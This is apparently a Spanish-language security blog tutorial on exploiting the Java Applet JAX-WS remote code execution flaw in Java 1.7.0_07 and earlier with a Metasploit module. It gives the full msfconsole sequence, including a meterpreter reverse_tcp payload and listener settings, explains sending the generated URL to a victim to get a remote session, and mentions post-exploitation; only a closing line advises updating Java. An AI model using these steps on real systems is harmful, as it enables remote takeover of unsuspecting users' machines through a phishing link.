Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.
El exploit respectivo para aprovecharse de esta vulnerabilidad se
encuentra respectivamente en los modulos de Metasploit y se puede
utilizar con tal solo realizar un msfupdate.
El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.
Los procedimientos y requerimientos para explotar esta vulnerabilidad
son muy simples, solo basta con tener BackTrack y un Sistema Virtual
para realizar las pruebas.
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit
Como ya es de conocimiento y costumbre, estos comandos creara una URL
que sera enviada a al usuario para que lo ejecute desde cualquier
navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera
que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.
Seguidamente si el usuario logra ejecutar la URL generada en cualquier
Sistema Operativo o Navegador, lograremos obtener una session metepreter
como se aprecia en la siguiente imagen:
Por lo tanto, solo quedaría ejecutar los respectivos comandos
de Explotación y Post-Explotacion para aprovecharnos del sistema que
hemos vulnerable con una simple URL gracias a este nuevo
exploit recién salida del horno.
VIDEO-TUTORIAL:
Para no ser victima de este Ataque, se recomienda actualizar el Java a
la ultima versión disponible, que se puede descargar haciendo clic Aqui.
Un saludo.
Autor: @CalebDrugs
Source: http://calebbucker.blogspot.com/
0 Notaciones:
Publicar un comentario